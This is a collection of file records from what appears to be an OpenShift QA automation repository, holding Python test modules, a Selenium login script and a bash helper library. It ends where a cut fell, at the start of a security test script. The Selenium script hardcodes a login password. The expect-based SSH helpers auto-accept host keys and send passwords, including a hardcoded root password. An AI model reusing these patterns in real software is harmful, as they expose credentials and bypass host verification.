QuickStartTest\n\nclass 
QuickStartDjango(QuickStartTest):\n    \n    def __init__(self, config):\n        rhtest.Test.__init__(self, config)\n        self.config.application_type = common.app_types[\"python\"]\n        self.config.application_embedded_cartridges = [ ]\n        self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: django\"\n        self.config.git_upstream_url = \"git://github.com/openshift/django-example.git\"\n        self.config.page = \"\" # means '/'\n        self.config.page_pattern = \"Yeah Django!\"\n    \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(QuickStartDjango)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.5972023010253906, "alphanum_fraction": 0.6083213686943054, "avg_line_length": 33.407405853271484, "blob_id": "0acb358f4fe55234742c2d9ceedb31d2234526fa", "content_id": "bbb7fd0bca1c6ea968be2b3d251de38334ff1272", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2788, "license_type": "no_license", "max_line_length": 209, "num_lines": 81, "path": "/automation/open/testmodules/RT/cartridge/php_framework_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge]PHP Framework Support\nhttps://tcms.engineering.redhat.com/case/122283/\n\"\"\"\nimport os,sys,re,time\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n    def initialize(self):\n        self.summary = \"[rhc-cartridge]PHP Framework Support\"\n        self.app_name = \"phpframework\"\n        self.app_type = common.app_types[\"php\"]\n        self.git_repo = \"./%s\" % (self.app_name)\n        tcms_testcase_id=122283\n        common.env_setup()\n\n        self.steps_list = []\n\n    def finalize(self):\n        os.system(\"rm -rf %s\"%(self.app_name))\n\nclass PhpFrameworkSupport(OpenShiftTest):\n    def test_method(self):\n\n        # 1.Create an app\n        self.steps_list.append(testcase.TestCaseStep(\"1. Create a php app\",\n            common.create_app,\n            function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n            expect_description=\"the app should be created successfully\",\n            expect_return=0))\n\n        # 2.Make some changes to the git repo\n        self.steps_list.append(testcase.TestCaseStep(\"2.Make some changes to the git repo\",\n            \"rm -rf %s/php/index.php && cp -f %s/app_template/php.template %s/php/index.php && cd %s && git add . 
&& git commit -am t && git push\" % (self.git_repo, WORK_DIR, self.git_repo, self.git_repo),\n expect_description=\"Git repo successfully modified\",\n expect_return=0))\n\n # 3.Check app via browser\n test_html = \"The Times-Tables\"\n \n self.steps_list.append(testcase.TestCaseStep(\"3.Check the app via browser\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), \n test_html, \"-H 'Pragma: no-cache'\", 3, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PhpFrameworkSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7412541508674622, "alphanum_fraction": 0.7498349547386169, "avg_line_length": 34.20930099487305, "blob_id": "9a320111f76a81c4a1af133d8b6dc1bfb1d79b8c", "content_id": "41016a67434871501339ed33046c8e9ac99b2fc7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1515, "license_type": "no_license", "max_line_length": 107, "num_lines": 43, "path": "/automation/webexample.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\ntest_env = 'https://bzweb01-qe.app.eng.rdu.redhat.com/'\ndev_env = 'https://bzweb01-devel.app.eng.rdu.redhat.com/'\n\nusername = '[email protected]'\npwd = 'redhat'\n\ndriver = webdriver.Firefox()\ndriver.get(dev_env)\ndriver.maximize_window()\n\nlogin_link_id = 'login_link_top'\nlogin_user_input_id = 'Bugzilla_login_top'\nlogin_user_pwd_id = 'Bugzilla_password_top'\nadmin_link_text = 'Administration'\nadmin_link_xpath = '//div/ul/li[11]/a'\nadmin_link_css = '#header ul li a[href=\"admin.cgi\"]'\n#css: html body.bzweb01-qe-app-eng-rdu-redhat-com div#header ul.links li a\n#or: html body.bzweb01-qe-app-eng-rdu-redhat-com div#footer ul#useful-links li#links-actions ul.links li a\n\nlogin_link = driver.find_element(by=By.ID, value=login_link_id)\nlogin_user_input = driver.find_element(by=By.ID, value=login_user_input_id)\nlogin_user_pwd = driver.find_element(by=By.ID, value=login_user_pwd_id)\n\nlogin_link.click()\n\nlogin_user_input.send_keys(username)\nlogin_user_pwd.send_keys(pwd)\nlogin_user_pwd.send_keys(Keys.RETURN)\n\n#admin_link = driver.find_element(By.LINK_TEXT, admin_link_text)\n#import time\n#time.sleep(5)\nWebDriverWait(driver, 10).until(\n EC.visibility_of_element_located((By.XPATH, admin_link_xpath)))\nadmin_link = driver.find_element(By.XPATH, admin_link_xpath)\nadmin_link.click()\n\n" }, { "alpha_fraction": 0.6063321232795715, "alphanum_fraction": 0.6135005950927734, "avg_line_length": 30.58490562438965, "blob_id": "8725da9d3a9770145b68f19aca91f1325276db19", "content_id": "4f47f705fb74c892048de7fccc94743659b2ecd5", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1674, "license_type": "no_license", "max_line_length": 116, "num_lines": 53, "path": "/automation/open/testmodules/RT/hot_deploy/python_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nOct 24, 2012\n\"\"\"\n\nimport rhtest\nimport common\nimport fileinput\nimport re\nfrom hot_deploy_test import HotDeployTest\n\nclass PythonHotDeployWithoutJenkins(HotDeployTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_name = common.getRandomString()\n self.config.application_type = common.app_types['python']\n self.config.scalable = False\n self.config.jenkins_is_needed = False\n self.config.summary = \"[US2747][RT]Hot deployment support for application - without Jenkins - python-2.6\"\n \n def configuration(self):\n self.log_info(\"Creating the application to check PID\")\n self.config.file_name = \"pid\"\n self.info(\"Editing file '%s'...\" % 'wsgi/application')\n try:\n for line in fileinput.input(\"./%s/wsgi/application\" % ( self.config.application_name ), inplace = True):\n if re.search(r'if environ.+PATH_INFO.+/env.+:', line):\n print \"\\tif environ['PATH_INFO'] == '/pid':\"\n print \"\\t\\tresponse_body = str(os.getppid())\"\n print line,\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n self.fail(\"Configuration of the test-application must be successful\")\n finally:\n fileinput.close()\n self.deploy()\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PythonHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5846632719039917, "alphanum_fraction": 0.5891397595405579, "avg_line_length": 32.58169937133789, "blob_id": "fb8130864b56fae301e7965a441222072dd04038", "content_id": "7da098693f5d3fa6843fc7db1c4ece0bf394ee5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5138, "license_type": "no_license", "max_line_length": 129, "num_lines": 153, "path": "/automation/open/testmodules/RT/scaling/negative_scaling1.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.test_variant=self.config.test_variant\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n\tself.domain_name = common.get_domain_name()\n self.app_type = common.app_types[self.test_variant]\n self.app_name = 'my%s%s' % ( self.test_variant, common.getRandomString() )\n self.git_repo = './' + self.app_name\n tcms_testcase_id=141096\n try:\n os.putenv('https_proxy', os.environ['http_proxy'])\n except:\n pass\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass NegativeScaling(OpenShiftTest):\n def configure_scale_up_test_application(self, git_repo):\n new_file = open(git_repo + \"/php/gear.php\", 
\"w\")\n        new_file.write(\"<?php\\n\")\n        new_file.write(\"header(\\\"Content-Type: text/plain\\\");\\n\")\n        new_file.write(\"echo $_ENV[\\\"OPENSHIFT_GEAR_DNS\\\"];\\n\")\n        new_file.write(\"?>\")\n        new_file.close()\n\n        configuration_steps = [\n            \"cd %s\" % ( git_repo ),\n            \"git add php\",\n            \"git commit -a -m gear.php\",\n            \"git push\"\n        ]\n\n        return common.command_get_status(\" && \".join(configuration_steps))\n\n    def number_of_gears(self, app_name):\n        app_url = OSConf.get_app_url(app_name)\n        gears = list()\n\n        # Check the output of the gear dns script multiple times\n        for i in range(1, 11):\n            gear = common.fetch_page(str(app_url) + \"/gear.php\")\n            if gear not in gears:\n                gears.append(gear)\n\n        return len(gears)\n\n    def test_method(self):\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Creating a scalable application\",\n            common.create_app,\n            function_parameters = [ self.app_name, self.app_type, self.user_email, self.user_passwd, True, self.git_repo, True ],\n            expect_description = \"The application must be created successfully\",\n            expect_return = 0\n        ))\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Scaling up via REST API\",\n            common.scale_up,\n            function_parameters = [ self.app_name, self.domain_name ],\n            expect_description = \"The application must scale-up successfully\",\n            expect_return = 0\n        ))\n\n        # Checking web-page availability with refreshing\n        for i in range(1,6):\n            self.steps_list.append(testcase.TestCaseStep(\n                \"Checking web-page #%d\" % ( i ),\n                common.check_web_page_output,\n                function_parameters = [ self.app_name ],\n                expect_description = \"The application must be available in the browser\",\n                expect_return = 0\n            ))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Configuring the test application\",\n            self.configure_scale_up_test_application,\n            function_parameters = [ self.git_repo ],\n            expect_description = \"The application must be configured successfully\",\n            expect_return = 0\n        ))\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Checking the number of gears\",\n            self.number_of_gears,\n            function_parameters = [ self.app_name ],\n            expect_description = \"The number of gears must be '2'\",\n            expect_return = 2\n        ))\n        \n        self.steps_list.append(testcase.TestCaseStep(\n            \"Scaling down via REST API\",\n            common.scale_down,\n            function_parameters = [ self.app_name, self.domain_name],\n            expect_description = \"The application must scale-down successfully\",\n            expect_return = 0\n        ))\n        \n        \n        self.steps_list.append(testcase.TestCaseStep(\n            \"Scaling down via REST API\",\n            common.scale_down,\n            function_parameters = [ self.app_name, self.domain_name],\n            expect_description = \"The application must scale-down successfully\",\n            expect_return = 0\n        ))\n        \n        case = testcase.TestCase(\"[US1463][BusinessIntegration] Scale-up / Scale down an application \", self.steps_list)\n        case.add_clean_up(\n            \"rm -Rf %s\" % ( self.git_repo )\n        )\n        case.run()\n\n\tif case.testcase_status == 'PASSED':\n\t    return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t    return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(NegativeScaling)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.4507547914981842, "alphanum_fraction": 0.46606144309043884, "avg_line_length": 28.14769172668457, "blob_id": "8ee52595c2dafdeba7cf12df725180d01e5e8d32", "content_id": 
"1ec85e7d183c731d8521c4463358bec8abe66c87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 9473, "license_type": "no_license", "max_line_length": 133, "num_lines": 325, "path": "/automation/open/Longevity/common_func.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#################################################################################\n# FileName: common_func.sh\n# Author: <[email protected]> \n# Description: provide the common function for all test cases\n# Version: 1.0\n# Function List: kill_process; end_test; run; error; info; check_point; sysinfo\n# kill_process: Kill the process based on the passed parameter.\n# target_reboot: Reboot the tested machine when the current run fails. \n# run: print the info for the command and execute the command\n# error: print the error information in a standard format\n# info: print some information with (INFO) tag\n# sysinfo: profile the system information\n# History: Revision history\n#################################################################################\n\nexport PATH=/sbin:/usr/sbin:/bin:$PATH\n\n#################################################################################\n#$0 $(file or directory) $ip $password $(source directory)\n#################################################################################\nscp_task()\n{\nexpect -f - <<EOF\nset timeout -1\nspawn scp -r $1 root@$2:$4\nexpect {\n\t\"Are you sure you want to continue connecting (yes/no)?\"\t\t{send \"yes\\r\";exp_continue}\n\t\"*assword:\"\t\t\t{send \"$3\\r\";exp_continue}\n}\nwait\nEOF\n}\n\n#################################################################################\n#$0 $ip $password \"command\"\n#################################################################################\ntask_ssh_root()\n{\nexpect -f - <<EOF\nset timeout -1\nspawn ssh root@$1 \"$3\"\nexpect {\n\t\"Are you sure you want to continue connecting (yes/no)?\"\t\t{send \"yes\\r\";exp_continue}\n\t\"*assword:\"\t\t\t{send \"$2\\r\";exp_continue}\n}\nwait\nEOF\n}\n\n#################################################################################\n# Function: kill_process\n# Description: Kill all processes matching the keyword\n# Input: keywords of child process name \n# Output: child process pid\n# Return: 0\n# Others: none\n#################################################################################\n\nfunction kill_process()\n{\nsign=$1\npid=`ps aux|grep $sign|grep -v grep|awk '{print $2}'`\nkill -9 $pid\nreturn 0\n}\n\n#################################################################################\n# Function: target_reboot \n# Description: Reboot the tested machine\n# Input: target machine IP\n# Output: none\n# Return: 0\n# Others: none\n#################################################################################\nfunction target_reboot()\n{\nexpect -f - <<EOF\nspawn ssh root@$SUT_IP \"init 6\"\nexpect {\n\t \"Are you sure you want to continue connecting (yes/no)?\" { send \"yes\\r\"; exp_continue }\n\t \"*assword:\" { send \"123456\\r\";exp_continue }\n\t\teof\t\t\t\t\t\t\t{ send_user \"eof\" }\n\t\t\t }\n\t\twait\nEOF\nsleep 1\nexit\nreturn 0\n}\n\n#################################################################################\n# Function: echo_$color\n# Description: echo in color to make the log output easier to read\n# Input: echo log\n# Output: none\n# Others: none\n#################################################################################\nfunction echo_red()\n{\n\t 
echo -e \"\\e[1;31m\"$*\"\\e[0m\"\n}\n\necho_blue()\n{ \n\t echo -e \"\\e[1;34m\"$*\"\\e[0m\" \n}\n\necho_green()\n{ \n\t echo -e \"\\e[1;32m\"$*\"\\e[0m\" \n}\n\necho_yellow()\n{ \n\techo -e \"\\e[1;33m\"$*\"\\e[0m\"\n}\n\necho_pink()\n{ \n\techo -e \"\\e[1;35m\"$*\"\\e[0m\"\n}\n\necho_bold()\n{ \n\t echo -e \"\\e[1;38m\"$*\"\\e[0m\" \n}\n\n\n#################################################################################\n# Function: run\n# Description: print the command information and execute the command\n# Input: the command\n# Output: the comand information and execution result\n# Return: return the value which returned by the command\n# Others: none\n#################################################################################\nfunction run()\n{\n\techo \n\techo_blue \"-------------------------Function $1 start-------------------------------\"\n\techo -n \"[$(pwd)]#\"\n\techo \"$*\"\n\teval \"$*\"\n\tr_value=$?\n\techo_blue \"--------------------------Function $1 end--------------------------------\"\n\tif [ \"$r_value\" -ne 0 ] ;then \n echo_red \"$1 function running failed!\" && \n runlevel|grep 5 > /dev/null && notify-send \"Testing failed ...\" \n #exit 1 \n else\n echo_green \"$1 function running end!\"\n fi\n\techo \n}\n\n#################################################################################\n# Function: task_scp\n# Description: Auto scp file to target machine\n# Input: file user@target_ip:/dir/\n# Output: none\n# Return: none\n# Others: none\n#################################################################################\nfunction task_scp()\n{\n\t#expect is a software suite for automating interactive tools\nexpect -f - <<EOF\nset timeout 6000\nspawn scp -r $1 $2@$3:$4\nexpect {\n\t\"Are you sure you want to continue connecting (yes/no)?\" { send \"yes\\r\" ; exp_continue }\n\t\"assword:\" { send \"$5\\r\"; exp_continue }\n\teof\t{ send_user \"eof\" }\n}\nwait\nEOF\n}\n\n#################################################################################\n# Function: sysinfo\n# Description: profile the system information\n# Input: none\n# Output: system information\n# Return: none\n# Others: none\n#################################################################################\nfunction sysinfo()\n{\n tmpstarts=`dmidecode | grep -n \"\" | grep \"Handle 0x\" | cut -d \":\" -f 1`\n shopt -s extglob\n tmpstarts=`echo $tmpstarts`\n tmpends=${tmpstarts/#+([[:digit:]]) /}\n tmpends=\"$tmpends 10000\"\n index=0\n for start in $tmpstarts\n do\n starts[$index]=$start\n index=$((index+1))\n done\n \n index=0\n for end in $tmpends\n do\n ends[$index]=$end\n index=$((index+1))\n done\n \n \n \n # processor\n echo \"Processor Information\"\n echo \"=====================\"\n processor=`mydmidecode -t processor | grep Version | head -n 1 | awk -F \":\" '{print $2}' | sed 's/^ //g' | sed 's/ \\{1,\\}/ /g'`\n if [ \"${processor:0:3}\" = \"Not\" ]\n then\n processor=`cat /proc/cpuinfo | grep \"model name\" | head -n 1 | awk -F \":\" '{print $2}' | sed 's/^ //g' | sed 's/ \\{1,\\}/ /g'`\n fi\n processornum=`mydmidecode -t processor | grep \"Socket Designation: \" | wc -l`\n \n cores=`cat /proc/cpuinfo | grep \"cpu cores\" | head -n 1 | sed 's/^.*: //g'`\n \n phymem=`mydmidecode -t memory | grep Size | awk 'BEGIN {sum=0} {if (int($2)!=0) sum+=$2} END {print sum/1024;}'`\n availmem=`cat /proc/meminfo | head -n 1 | awk '{printf \"%.2f\", $2/1024/1024;}'`\n \n echo \"processor type: $processor\"\n echo \"number of CPU: $processornum\"\n echo \"number of core per CPU: $cores\"\n \n # 
Cache info\n index=0\n tmpvar=`mydmidecode -t cache | grep \"Configuration: \" | grep \"Level \" | sed 's/^.*, Level //g'`\n for item in $tmpvar\n do\n levels[$index]=$item\n index=$((index+1))\n done\n \n index=0\n tmpvar=`mydmidecode -t cache | grep \"System Type\" | cut -d \":\" -f 2 | sed 's/ //g'`\n for item in $tmpvar\n do\n cachetypes[$index]=$item\n index=$((index+1))\n done\n \n index=0\n tmpvar=`mydmidecode -t cache | grep \"Installed Size\" | cut -d \":\" -f 2 | sed 's/ //g'`\n for item in $tmpvar\n do\n cachesizes[$index]=$item\n index=$((index+1))\n done\n \n rm -f /tmp/.cacheinfo.txt\n for (( i = 0; i < $index; i++ ))\n do\n echo \"L${levels[$i]} ${cachetypes[$i]} cache size: ${cachesizes[$i]/KB/ KB}\" >> /tmp/.cacheinfo.txt\n done\n cat /tmp/.cacheinfo.txt | sort | uniq\n rm -f /tmp/.cacheinfo.txt\n echo \"\"\n \n # Memory\n echo \"Memory Information\"\n echo \"==================\"\n echo \"Physical memory size: $phymem GB\"\n echo \"Available memory size: $availmem GB\"\n echo \"\"\n \n # Harddisk\n echo \"Harddisk Information\"\n echo \"====================\"\n fdisk -l 2>&1 | grep Disk | sed 's/^Disk //g'\n echo \"\"\n \n # SCSI device list\n which lsscsi > /dev/null 2>&1\n if [ $? -eq 0 ]\n then\n echo \"SCSI Device List\"\n echo \"================\"\n lsscsi\n fi\n echo \"\"\n \n # PCI/PCIE Slot Information\n rm -f /tmp/.pciinfo1.txt\n rm -f /tmp/.pciinfo2.txt\n echo \"PCI/PCIE Slot Information\"\n echo \"=========================\"\n printf \"%20s\\t%s\\n\" \"Slot\" \"Type\"\n printf \"%20s\\t%s\\n\" \"----\" \"----\"\n mydmidecode -t slot | grep \"Designation: \" | sed 's/^.*Designation: //g' > /tmp/.pciinfo1.txt\n mydmidecode -t slot | grep \"Type: \" | sed 's/^.*Type: //g' > /tmp/.pciinfo2.txt\n \n lines=`cat /tmp/.pciinfo2.txt | wc -l`\n for (( i = 0; i < $lines; i++ ))\n do\n slot=`cat /tmp/.pciinfo1.txt | sed -n \"$((i+1))\"p | sed 's/^ \\{1,\\}//g' | sed 's/ \\{1,\\}$//g'`\n type=`cat /tmp/.pciinfo2.txt | sed -n \"$((i+1))\"p`\n printf \"%20s\\t%s\\n\" \"$slot\" \"$type\"\n done\n rm -f /tmp/.pciinfo1.txt\n rm -f /tmp/.pciinfo2.txt\n echo \"\"\n \n # lspci\n echo \"PCI Device Information\"\n echo \"======================\"\n lspci | cut -d \" \" -f 2-\n echo \"\"\n \n # On Board Device Information\n echo \"On Board Device Information\"\n echo \"===========================\"\n mydmidecode -t baseboard | grep -A 200 \"On Board Device\" | grep \"Description: \" | sed 's/^.*Description: //g'\n echo \"\"\n \n # OS Version\n echo \"OS Version\"\n echo \"==========\"\n cat /etc/*-release\n}\n" }, { "alpha_fraction": 0.5776389837265015, "alphanum_fraction": 0.5833854079246521, "avg_line_length": 53.828765869140625, "blob_id": "a44ed1ccad02e9c7980d34f231d4d7475479d82d", "content_id": "09674a2fb07308725d8a9cb0e2305a699d6fc908", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8005, "license_type": "no_license", "max_line_length": 235, "num_lines": 146, "path": "/automation/open/testmodules/RT/cartridge/snapshot_restore_big_data_to_new_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-07-24\n\n[rhc-cartridge]snapshot/restore big data to new app\nhttps://tcms.engineering.redhat.com/case/167902/\n\"\"\"\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport time\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 
'STG'] #this will be checked by framework\n WORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `php` as default\")\n self.test_variant = 'php'\n self.summary = \"[rhc-cartridge]snapshot/restore big data to new app\"\n self.app_name = self.test_variant.split('-')[0] + \"bigdata\" + common.getRandomString(4)\n self.app_type = common.app_types[self.test_variant]\n self.git_repo = \"./%s\" % (self.app_name)\n self.filesize = 300 # filesize is calculated by MB\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -f %s*\" % (self.app_name))\n\n\nclass BigDataTest(OpenShiftTest):\n\n def test_method(self):\n self.step(\"Create %s app: %s\" % (self.app_type, self.app_name))\n ret = common.create_app(self.app_name, common.app_types[self.test_variant], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", self.scalable)\n self.assert_equal(ret, 0, \"Failed to create %s app: %s\" % (self.app_type, self.app_name))\n\n self.app_url = OSConf.get_app_url(self.app_name)\n self.url_dict = { \"php\" : { \"create\": \"%s/data.php?action=create&size=%s\" % (self.app_url, self.filesize),\n \"delete\": \"%s/data.php?action=delete\" % (self.app_url),\n \"show\" : \"%s/data.php?action=show\" % (self.app_url)},\n \"jbossas\": { \"create\": \"%s/data.jsp?action=create&size=%s\" % (self.app_url, self.filesize),\n \"delete\": \"%s/data.jsp?action=delete\" % (self.app_url),\n \"show\" : \"%s/data.jsp?action=show\" % (self.app_url)},\n \"perl\" : { \"create\": \"%s/data.pl?action=create&size=%s\" % (self.app_url, self.filesize),\n \"delete\": \"%s/data.pl?action=delete\" % (self.app_url),\n \"show\" : \"%s/data.pl?action=show\" % (self.app_url)},\n \"python\": { \"create\": \"%s/create?size=%s\" % (self.app_url, self.filesize),\n \"delete\": \"%s/delete\" % (self.app_url),\n \"show\" : \"%s/show\" % (self.app_url)},\n \"ruby\" : { \"create\": \"%s/create?size=%s\" % (self.app_url, self.filesize),\n \"delete\": \"%s/delete\" % (self.app_url),\n \"show\" : \"%s/show\" % (self.app_url)},\n }\n self.url_dict[\"jbosseap\"] = self.url_dict[\"jbossas\"]\n self.url_dict[\"jbossews\"] = self.url_dict[\"jbossas\"]\n self.url_dict[\"jbossews-2.0\"] = self.url_dict[\"jbossas\"]\n self.url_dict[\"ruby-1.9\"] = self.url_dict[\"ruby\"]\n\n self.step(\"Copy sample app to git repo\")\n if self.test_variant in ('php'):\n cmd = \"cp -f %s/app_template/bigdata/datadir/data.php %s/php/\" % (OpenShiftTest.WORK_DIR, self.git_repo)\n elif self.test_variant in ('jbossas', 'jbosseap','jbossews','jbossews-2.0'):\n cmd = \"cp -f %s/app_template/bigdata/datadir/data.jsp %s/src/main/webapp/\" % (OpenShiftTest.WORK_DIR, self.git_repo)\n elif self.test_variant in ('perl'):\n cmd = \"cp -f %s/app_template/bigdata/datadir/data.pl %s/perl/\" % (OpenShiftTest.WORK_DIR, self.git_repo)\n elif self.test_variant in ('python'):\n cmd = \"cp -f %s/app_template/bigdata/datadir/application %s/wsgi/\" % (OpenShiftTest.WORK_DIR, self.git_repo)\n elif self.test_variant in ('ruby', 'ruby-1.9'):\n cmd = \"cp -f %s/app_template/bigdata/datadir/{config.ru,Gemfile} %s/ && cd %s/ ; bundle check ; bundle install\" % (OpenShiftTest.WORK_DIR, self.git_repo, self.git_repo)\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Failed to copy sample app to local git repo\")\n\n self.step(\"Git push all 
the changes\")\n cmd = \"cd %s && git add . && git commit -amt && git push\" % (self.git_repo)\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Git push failed\")\n\n self.step(\"Wait for the app to become available\")\n url = self.url_dict[self.test_variant][\"show\"]\n ret = common.grep_web_page(url, \"The bigfile doesnot exist\", \"-H 'Pragma: no-cache' -L\", 5, 4)\n self.assert_equal(ret, 0, \"The app doesn't become available in reasonable time\")\n\n # This step may take very long time\n self.step(\"Access the 'create' page to create a big file\")\n self.info(\"This step may take a very long time\")\n url = self.url_dict[self.test_variant][\"create\"]\n cmd = \"curl -H 'Pragma: no-cache' -L '%s'\" % (url)\n ret = common.command_get_status(cmd, timeout=-1)\n\n self.step(\"Check the bigfile exists\")\n url = self.url_dict[self.test_variant][\"show\"]\n ret = common.grep_web_page(url, \"The bigfile exists\", \"-H 'Pragma: no-cache' -L\", 5, 6)\n self.assert_equal(ret, 0, \"The bigfile doesn't exist\")\n\n self.step(\"Take snapshot of the app\")\n self.info(\"This step may take a very long time(more than half an hour). If it hangs forever, please terminate this script and test manually\")\n cmd = \"rm -f %s.tar.gz ; rhc snapshot save %s -f %s.tar.gz -l %s -p '%s' %s\" % (self.app_name, self.app_name, self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS)\n ret = common.command_get_status(cmd, timeout=-1)\n self.assert_equal(ret, 0, \"Failed to save snapshot\")\n\n self.step(\"Destroy the app\")\n ret = common.destroy_app(self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True)\n self.assert_equal(ret, 0, \"Failed to destroy app: %s\" % (self.app_name))\n\n self.step(\"Create a new app with the same name\")\n ret = common.create_app(self.app_name, common.app_types[self.test_variant], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", self.scalable)\n self.assert_equal(ret, 0, \"Failed to re-create %s app: %s\" % (self.app_type, self.app_name))\n\n self.step(\"Use the snapshot tarball to restore it\")\n self.info(\"This step may take a very long time. 
If it hangs forever, please terminate this script and test manually\")\n cmd = \"rhc snapshot restore %s -f %s.tar.gz -l %s -p '%s' %s\" % (self.app_name, self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS)\n ret = common.command_get_status(cmd, timeout=-1)\n self.assert_equal(ret, 0, \"Failed to restore the new app\")\n\n self.step(\"Check if the bigfile is restored\")\n url = self.url_dict[self.test_variant][\"show\"]\n ret = common.grep_web_page(url, \"The bigfile exists\", \"-H 'Pragma: no-cache' -L\", 5, 6)\n self.assert_equal(ret, 0, \"The bigfile isn't successfully restored\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(BigDataTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5764349102973938, "alphanum_fraction": 0.623034656047821, "avg_line_length": 19.6171875, "blob_id": "1b125c41b5c6ded87b3045fd891d18ce18e24d14", "content_id": "b29f74eecefe1b3ac4968c0d1e9ff55395853f0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 5279, "license_type": "no_license", "max_line_length": 98, "num_lines": 256, "path": "/automation/open/testmodules/RT/security/data/read_write_libra_important_data_devenv.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/sh\nuser_home=$(env | grep '^HOME=' | cut -d= -f2)\necho \"User Home Directory: 